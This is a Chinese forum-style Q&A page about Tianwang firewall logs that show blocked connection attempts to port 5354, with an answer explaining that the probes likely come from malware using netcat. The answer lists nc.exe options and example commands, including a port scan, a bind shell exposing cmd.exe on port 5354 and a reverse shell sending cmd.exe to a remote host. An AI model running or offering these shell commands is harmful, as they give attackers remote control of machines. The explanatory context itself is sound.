芍药居中海油大厦:天网防火墙问题!

来源:百度文库 编辑:神马品牌网 时间:2024/04/29 21:06:12
220.163.81.186试图连接本机的5354端口,
TCP标志:S,
该操作被拒绝。

218.2.112.18试图连接本机的5354端口,
TCP标志:S,
该操作被拒绝。

222.223.116.53试图连接本机的5354端口,
TCP标志:S,
该操作被拒绝。

218.2.112.18试图连接本机的5354端口,
TCP标志:S,
该操作被拒绝。

已经拦截,问题就不大了.

实话告诉你...
终结者说过...(那就是病毒)

有个软件 叫瑞士军刀
要探测这个端口,但被你的防火墙禁止了。你是安全的,放心好了。

瑞士军刀:nc.exe

参数说明:
-h 查看帮助信息
-d 后台模式
-e prog程序重定向,一但连接就执行〔危险〕
-i secs延时的间隔
-l 监听模式,用于入站连接
-L 监听模式,连接天闭后仍然继续监听,直到CTR+C
-n IP地址,不能用域名
-o film记录16进制的传输
-p[空格]端口 本地端口号
-r 随机本地及远程端口
-t 使用Telnet交互方式
-u UDP模式
-v 详细输出,用-vv将更详细
-w数字 timeout延时间隔
-z 将输入,输出关掉(用于扫锚时)
基本用法:
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
nc -l -p 80 开启本机的TCP 80端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口